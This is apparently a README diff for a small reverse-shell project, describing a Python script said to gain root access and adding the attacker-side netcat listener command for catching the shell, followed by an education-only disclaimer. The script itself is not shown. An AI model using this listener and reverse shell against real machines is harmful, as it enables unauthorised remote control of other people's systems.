normallab/reshell_scriptKitty/README.md

 This project contains a python file that starts a revers shell attack wich can be used as a exploit to gain root 🌳.

+# How to start the attack
+start by listening on the attackers side command : ssty raw -echo; (stty size; cat) | nc -lvnp port -s IPaddr

 # disclamer
 please don't spread this as malware or use on othere's with out concent, this script was made for the pure pupose of education and cyber sucrity in mind.